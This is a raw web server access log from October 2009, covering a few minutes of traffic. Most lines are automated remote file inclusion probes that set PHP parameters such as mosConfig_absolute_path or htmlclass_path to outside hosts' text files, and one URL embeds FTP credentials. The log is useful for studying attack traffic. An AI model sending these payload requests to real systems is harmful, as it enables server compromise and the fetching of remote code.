211.172.225.50 - - [13/Oct/2009:05:09:52 -0400] "GET /logs/access_log.Q109081400%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
174.143.3.188 - - [13/Oct/2009:05:10:01 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
174.143.3.188 - - [13/Oct/2009:05:10:02 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
124.0.54.130 - - [13/Oct/2009:05:10:49 -0400] "GET /logs/access_log.Q109083100%20%20//include/mail.inc.php?skin_board_path=http://dc.kaya.ac.kr/~architecture/board//skin/zero_cyan/1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
211.172.225.50 - - [13/Oct/2009:05:11:31 -0400] "GET /logs/access_log.Q109080400%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
211.172.225.50 - - [13/Oct/2009:05:11:31 -0400] "GET /logs/access_log.Q109081400%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
64.150.183.219 - - [13/Oct/2009:05:11:40 -0400] "GET /logs/phphtml.php?htmlclass_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
64.150.183.219 - - [13/Oct/2009:05:11:40 -0400] "GET /phphtml.php?htmlclass_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
64.150.183.219 - - [13/Oct/2009:05:11:40 -0400] "GET /logs/access_log.Q109052300/phphtml.php?htmlclass_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
64.150.183.219 - - [13/Oct/2009:05:11:43 -0400] "GET /phphtml.php?htmlclass_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
64.150.183.219 - - [13/Oct/2009:05:11:43 -0400] "GET /logs/phphtml.php?htmlclass_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
64.150.183.219 - - [13/Oct/2009:05:11:43 -0400] "GET /logs/access_log.Q109052300/phphtml.php?htmlclass_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.59.12.99 - - [13/Oct/2009:05:11:43 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
64.150.183.219 - - [13/Oct/2009:05:11:45 -0400] "GET /phphtml.php?htmlclass_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
64.150.183.219 - - [13/Oct/2009:05:11:45 -0400] "GET /logs/access_log.Q109052300%20%20/phphtml.php?htmlclass_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
64.150.183.219 - - [13/Oct/2009:05:11:45 -0400] "GET /logs/phphtml.php?htmlclass_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
64.150.183.219 - - [13/Oct/2009:05:11:46 -0400] "GET /phphtml.php?htmlclass_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
64.150.183.219 - - [13/Oct/2009:05:11:46 -0400] "GET /logs/phphtml.php?htmlclass_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
64.150.183.219 - - [13/Oct/2009:05:11:46 -0400] "GET /logs/access_log.Q109052300%20%20/phphtml.php?htmlclass_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
64.150.183.219 - - [13/Oct/2009:05:11:51 -0400] "GET /logs/access_log.Q109052400/phphtml.php?htmlclass_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
64.150.183.219 - - [13/Oct/2009:05:11:54 -0400] "GET /logs/access_log.Q109052400%20%20/phphtml.php?htmlclass_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
64.150.183.219 - - [13/Oct/2009:05:11:54 -0400] "GET /logs/access_log.Q109052400/phphtml.php?htmlclass_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
64.150.183.219 - - [13/Oct/2009:05:11:54 -0400] "GET /logs/access_log.Q109052400%20%20/phphtml.php?htmlclass_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
65.55.108.243 - - [13/Oct/2009:05:12:01 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/4.0"
211.206.120.162 - - [13/Oct/2009:05:12:03 -0400] "GET /logs/phphtml.php?htmlclass_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
211.206.120.162 - - [13/Oct/2009:05:12:03 -0400] "GET /phphtml.php?htmlclass_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
211.206.120.162 - - [13/Oct/2009:05:12:03 -0400] "GET /logs/access_log.Q109052300/phphtml.php?htmlclass_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
211.206.120.162 - - [13/Oct/2009:05:12:04 -0400] "GET /logs/access_log.Q109052300/phphtml.php?htmlclass_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
211.206.120.162 - - [13/Oct/2009:05:12:04 -0400] "GET /logs/phphtml.php?htmlclass_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
211.206.120.162 - - [13/Oct/2009:05:12:04 -0400] "GET /phphtml.php?htmlclass_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
65.55.108.243 - - [13/Oct/2009:05:12:01 -0400] "GET /logs/access_log.Q109051200 HTTP/1.1" 200 6040641 "-" "Mozilla/4.0"
211.206.120.162 - - [13/Oct/2009:05:12:17 -0400] "GET /logs/access_log.Q109052400/phphtml.php?htmlclass_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
211.206.120.162 - - [13/Oct/2009:05:12:18 -0400] "GET /logs/access_log.Q109052400/phphtml.php?htmlclass_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
64.150.183.219 - - [13/Oct/2009:05:12:29 -0400] "GET /logs/access_log.Q109052300/phphtml.php?htmlclass_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
74.6.8.108 - - [13/Oct/2009:05:12:30 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.8.108 - - [13/Oct/2009:05:12:30 -0400] "GET /logs/error_log.Q109092700 HTTP/1.0" 200 3048218 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
64.150.183.219 - - [13/Oct/2009:05:12:34 -0400] "GET /phphtml.php?htmlclass_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
64.150.183.219 - - [13/Oct/2009:05:12:34 -0400] "GET /logs/phphtml.php?htmlclass_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
64.150.183.219 - - [13/Oct/2009:05:12:38 -0400] "GET /logs/access_log.Q109052400/phphtml.php?htmlclass_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
64.150.183.219 - - [13/Oct/2009:05:12:39 -0400] "GET /phphtml.php?htmlclass_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
64.150.183.219 - - [13/Oct/2009:05:12:39 -0400] "GET /logs/access_log.Q109052300/phphtml.php?htmlclass_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
64.150.183.219 - - [13/Oct/2009:05:12:39 -0400] "GET /logs/phphtml.php?htmlclass_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
121.78.82.142 - - [13/Oct/2009:05:12:41 -0400] "GET /logs/access_log.Q109051400//appserv/errors.php?error=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
64.150.183.219 - - [13/Oct/2009:05:12:44 -0400] "GET /logs/access_log.Q109052400/phphtml.php?htmlclass_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
121.78.82.142 - - [13/Oct/2009:05:12:44 -0400] "GET /logs/access_log.Q109092600//appserv/errors.php?error=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
121.78.82.142 - - [13/Oct/2009:05:12:47 -0400] "GET /logs/access_log.Q109051400//appserv/errors.php?error=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
124.0.54.130 - - [13/Oct/2009:05:12:48 -0400] "GET /logs/access_log.Q109091000%20%20//include/mail.inc.php?skin_board_path=http://dc.kaya.ac.kr/~architecture/board//skin/zero_cyan/1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
121.78.82.142 - - [13/Oct/2009:05:12:49 -0400] "GET /logs/access_log.Q109092600//appserv/errors.php?error=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
74.6.8.108 - - [13/Oct/2009:05:12:32 -0400] "GET /logs/error_log.Q109092700 HTTP/1.0" 200 3048218 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
211.206.120.162 - - [13/Oct/2009:05:13:24 -0400] "GET /logs/phphtml.php?htmlclass_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
211.206.120.162 - - [13/Oct/2009:05:13:24 -0400] "GET /logs/access_log.Q109052300%20%20/phphtml.php?htmlclass_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
211.206.120.162 - - [13/Oct/2009:05:13:24 -0400] "GET /phphtml.php?htmlclass_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
211.206.120.162 - - [13/Oct/2009:05:13:33 -0400] "GET /logs/phphtml.php?htmlclass_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
211.206.120.162 - - [13/Oct/2009:05:13:33 -0400] "GET /logs/access_log.Q109052300%20%20/phphtml.php?htmlclass_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
211.206.120.162 - - [13/Oct/2009:05:13:33 -0400] "GET /phphtml.php?htmlclass_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
207.210.84.226 - - [13/Oct/2009:05:13:42 -0400] "GET /logs/errors.php?error=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
207.210.84.226 - - [13/Oct/2009:05:13:42 -0400] "GET /logs/access_log.Q109070900/errors.php?error=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
207.210.84.226 - - [13/Oct/2009:05:13:43 -0400] "GET /errors.php?error=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
211.206.120.162 - - [13/Oct/2009:05:13:59 -0400] "GET /phphtml.php?htmlclass_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
211.206.120.162 - - [13/Oct/2009:05:13:59 -0400] "GET /logs/phphtml.php?htmlclass_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
211.206.120.162 - - [13/Oct/2009:05:13:59 -0400] "GET /logs/access_log.Q109052300/phphtml.php?htmlclass_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
211.206.120.162 - - [13/Oct/2009:05:14:01 -0400] "GET /phphtml.php?htmlclass_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
211.206.120.162 - - [13/Oct/2009:05:14:01 -0400] "GET /logs/access_log.Q109052300/phphtml.php?htmlclass_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
211.206.120.162 - - [13/Oct/2009:05:14:01 -0400] "GET /logs/phphtml.php?htmlclass_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
211.206.120.162 - - [13/Oct/2009:05:14:05 -0400] "GET /logs/access_log.Q109052400/phphtml.php?htmlclass_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
211.206.120.162 - - [13/Oct/2009:05:14:06 -0400] "GET /logs/access_log.Q109052400/phphtml.php?htmlclass_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
206.108.7.161 - - [13/Oct/2009:05:14:06 -0400] "GET /logs/error_log.Q109060300%20//components/com_forum/download.php?phpbb_root_path=ftp://michigan:mifruit103011@74.52.244.86/public_html/v6id.txt??%0D?? HTTP/1.1" 404 259 "-" "libwww-perl/5.79"
206.108.7.161 - - [13/Oct/2009:05:14:06 -0400] "GET /logs/error_log.Q109051200%20//components/com_forum/download.php?phpbb_root_path=ftp://michigan:mifruit103011@74.52.244.86/public_html/v6id.txt??%0D?? HTTP/1.1" 404 259 "-" "libwww-perl/5.79"
168.143.19.89 - - [13/Oct/2009:05:14:18 -0400] "GET /logs/error_log.Q109060300%20//components/com_forum/download.php?phpbb_root_path=ftp://michigan:mifruit103011@74.52.244.86/public_html/v6id.txt??%0D?? HTTP/1.1" 404 259 "-" "libwww-perl/5.825"
168.143.19.89 - - [13/Oct/2009:05:14:18 -0400] "GET /logs/error_log.Q109051200%20//components/com_forum/download.php?phpbb_root_path=ftp://michigan:mifruit103011@74.52.244.86/public_html/v6id.txt??%0D?? HTTP/1.1" 404 259 "-" "libwww-perl/5.825"
79.64.224.47 - - [13/Oct/2009:05:15:16 -0400] "GET /phphtml.php?htmlclass_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
79.64.224.47 - - [13/Oct/2009:05:15:19 -0400] "GET /logs/phphtml.php?htmlclass_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
79.64.224.47 - - [13/Oct/2009:05:15:19 -0400] "GET /logs/access_log.Q109052300/phphtml.php?htmlclass_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
207.210.84.226 - - [13/Oct/2009:05:15:32 -0400] "GET /logs/access_log.Q109070900%20%20/errors.php?error=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
121.78.82.142 - - [13/Oct/2009:05:15:45 -0400] "GET /logs/access_log.Q109051400//appserv/errors.php?error=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
121.78.82.142 - - [13/Oct/2009:05:15:48 -0400] "GET /logs/access_log.Q109092600//appserv/errors.php?error=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
79.64.224.47 - - [13/Oct/2009:05:15:50 -0400] "GET /logs/access_log.Q109052400%20%20/phphtml.php?htmlclass_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
200.135.218.37 - - [13/Oct/2009:05:15:51 -0400] "GET /logs//component/option,com_weblinks/Itemid,23//index2?mosConfig_absolute_path=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
200.135.218.37 - - [13/Oct/2009:05:15:51 -0400] "GET /logs/access_log.Q109070900%20%20//component/option,com_weblinks/Itemid,23//index2?mosConfig_absolute_path=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
200.135.218.37 - - [13/Oct/2009:05:15:51 -0400] "GET //component/option,com_weblinks/Itemid,23//index2?mosConfig_absolute_path=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
79.64.224.47 - - [13/Oct/2009:05:15:56 -0400] "GET /logs/access_log.Q109052400/phphtml.php?htmlclass_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.97.212.185 - - [13/Oct/2009:05:16:25 -0400] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://montaguekorea.com/upload/bbs/idxx.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
209.97.212.185 - - [13/Oct/2009:05:16:25 -0400] "GET /logs/access_log.Q109072200/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://montaguekorea.com/upload/bbs/idxx.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
209.97.212.185 - - [13/Oct/2009:05:16:25 -0400] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://montaguekorea.com/upload/bbs/idxx.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
209.59.12.99 - - [13/Oct/2009:05:16:44 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
200.135.218.37 - - [13/Oct/2009:05:17:01 -0400] "GET //component/option,com_weblinks/Itemid,23//index2?mosConfig_absolute_path=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
200.135.218.37 - - [13/Oct/2009:05:17:01 -0400] "GET /logs//component/option,com_weblinks/Itemid,23//index2?mosConfig_absolute_path=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
200.135.218.37 - - [13/Oct/2009:05:17:01 -0400] "GET /logs/access_log.Q109070900//component/option,com_weblinks/Itemid,23//index2?mosConfig_absolute_path=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
220.181.7.94 - - [13/Oct/2009:05:17:04 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
209.97.212.185 - - [13/Oct/2009:05:17:10 -0400] "GET /logs/access_log.Q109092000/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://montaguekorea.com/upload/bbs/idxx.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
123.125.66.73 - - [13/Oct/2009:05:18:41 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
222.233.52.18 - - [13/Oct/2009:05:19:43 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
222.233.52.18 - - [13/Oct/2009:05:19:43 -0400] "GET /logs/access_log.Q109062100%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
222.233.52.18 - - [13/Oct/2009:05:19:43 -0400] "GET /logs/error_log.Q109062100%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
222.233.52.18 - - [13/Oct/2009:05:19:43 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 200 21657 "-" "Mozilla/5.0"
222.233.52.18 - - [13/Oct/2009:05:19:52 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
222.233.52.18 - - [13/Oct/2009:05:19:52 -0400] "GET /logs/access_log.Q109062100%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
222.233.52.18 - - [13/Oct/2009:05:19:52 -0400] "GET /logs/error_log.Q109062100%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
222.233.52.18 - - [13/Oct/2009:05:19:52 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 200 21657 "-" "Mozilla/5.0"
200.35.150.139 - - [13/Oct/2009:05:20:02 -0400] "GET //index2.php?x=https://www.thinkfasttoys.com/images/M/gepat.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
200.35.150.139 - - [13/Oct/2009:05:20:02 -0400] "GET /logs/error_log.Q109082300//index2.php?x=https://www.thinkfasttoys.com/images/M/gepat.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.35.150.139 - - [13/Oct/2009:05:20:03 -0400] "GET /logs//index2.php?x=https://www.thinkfasttoys.com/images/M/gepat.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
200.35.150.139 - - [13/Oct/2009:05:20:18 -0400] "GET /logs/access_log.Q109051500//index2.php?x=https://www.thinkfasttoys.com/images/M/gepat.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
174.143.3.188 - - [13/Oct/2009:05:20:32 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
174.143.3.188 - - [13/Oct/2009:05:20:32 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
174.143.3.188 - - [13/Oct/2009:05:20:33 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
174.143.3.188 - - [13/Oct/2009:05:20:33 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
203.229.58.122 - - [13/Oct/2009:05:20:56 -0400] "GET //include/admin.lib.inc.php?site_path=http://honamit.com/.../id1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
203.229.58.122 - - [13/Oct/2009:05:20:56 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://honamit.com/.../id1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
203.229.58.122 - - [13/Oct/2009:05:20:56 -0400] "GET /logs/access_log.Q109091600//include/admin.lib.inc.php?site_path=http://honamit.com/.../id1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
211.40.68.132 - - [13/Oct/2009:05:21:00 -0400] "GET /logs/access_log.Q109080400%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
211.40.68.132 - - [13/Oct/2009:05:21:04 -0400] "GET /logs/access_log.Q109081400%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
211.40.68.132 - - [13/Oct/2009:05:21:23 -0400] "GET /logs/access_log.Q109080400%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
211.40.68.132 - - [13/Oct/2009:05:21:24 -0400] "GET /logs/access_log.Q109081400%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
209.59.12.99 - - [13/Oct/2009:05:21:44 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
200.35.150.139 - - [13/Oct/2009:05:21:53 -0400] "GET /logs/error_log.Q109082300%20%20//index2.php?x=https://www.thinkfasttoys.com/images/M/gepat.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
200.35.150.139 - - [13/Oct/2009:05:21:58 -0400] "GET /logs/access_log.Q109051500%20%20//index2.php?x=https://www.thinkfasttoys.com/images/M/gepat.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
209.97.212.185 - - [13/Oct/2009:05:22:13 -0400] "GET /logs/access_log.Q109072200%20%20/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://montaguekorea.com/upload/bbs/idxx.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
209.97.212.185 - - [13/Oct/2009:05:22:14 -0400] "GET /logs/access_log.Q109092000%20%20/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://montaguekorea.com/upload/bbs/idxx.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
203.229.58.122 - - [13/Oct/2009:05:22:16 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://honamit.com/.../id1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
